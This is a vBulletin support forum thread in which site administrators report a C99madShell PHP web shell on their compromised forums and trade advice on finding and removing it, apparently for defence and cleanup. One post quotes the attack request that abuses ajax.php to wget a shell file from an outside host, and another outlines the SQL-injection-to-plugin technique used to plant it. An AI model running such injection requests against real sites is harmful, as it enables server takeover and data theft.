![]() |
C99madShell v. 2.0 madnet edition
I upgraded vBulletin 3.8 from 3.7, and now when ever I try to edit subscriptions, this comes up... its a PHP Shell script....
--------------- Added [DATE]1232510889[/DATE] at [TIME]1232510889[/TIME] --------------- Ok... it was going back to the init.php file, and told me this line ($hook = vBulletinHook::fetch_hook('init_startup')) ? eval($hook) : false; I commented that line out (//) and it went away.... --------------- Added [DATE]1232511838[/DATE] at [TIME]1232511838[/TIME] --------------- solved.... error.php |
By commenting that line, you are only disabling that hook. It hasn't fixed the hole that allowed the attacker to run the shell in the first place.
|
No, by SOLVED I meant I removed the script.. (The shell script)
|
That still does not solve how the attacker got the file there. Unless you know that already too?
|
am having this problem as well.....When I try to edit the payments manager I get the above msg
!C99madShell v. 2.0 madnet edition! Software: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8m DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_fcgid/2.3.5. PHP/5.2.13 |
This is a trojan, just google for it. You should contact your host ASAP to find out how it got into your account and to remove all traces of it.
|
Um, it's not a Trojan :P
http://www.derekfountain.org/security_c99madshell.php You've encountered the first evidence that your site has been compromised! Cheers! |
Quote:
|
they get the file on your server by ajax.php - they use it like forum.com/ajax.php?global=wget http://www.examplewebsite.org/c100.txt
Then they process this from here. I would recommend vbulletin upgrading / securing the ajax.php asap |
Quote:
But how would you call an unwanted script that gives an unauthorized person backdoor access to system functions and data? |
Right now i have the exactly same problem. Does anyone know how to solve this problem please ? I am running my own dedicated server but since am not good with server management, i do not have any idea about what to do on server side if it's not about a file removing or something like that...
|
I saw this for the first time on a client's install two or so months ago. None of the vBulletin files were modified and the database was clean so I was stumped at first. It turns out this particular exploit uses vB's plugin/hook system; if you see a strange plugin (note I said plugin, not product), remove it. Then, find out how it got on there. xD
Just read a document on this exploit; bad file permission or upload script setups could allow something like this to happen. |
I think Shell is malicious :)
|
Quote:
What actually happens is they use sql injection via an unsafe modification to install a plugin on the ajax hook, then use that malicious plugin to install the file. If you forum directory was properly secured as read only (to apache) then that wget would fail to actually save the file. |
How would I get rid of this ive been comprimised as well...
Is it in a folder in FTP is it a CODE I can delete etc |
Quote:
Edit: You can try POST #4 shown in this thread - https://www.vbulletin.com/forum/show...i-e-p0wersurge |
Look into the PLUGIN MANAGER and check for any suspect plugins installed. I found 4 of them.
This is a period of nasty hacking time. |
All times are GMT. The time now is 12:48 PM. |
Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2025, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information | |
---|---|
|
|
![]() |
|
Template Usage:
Phrase Groups Available:
|
Included Files:
Hooks Called:
|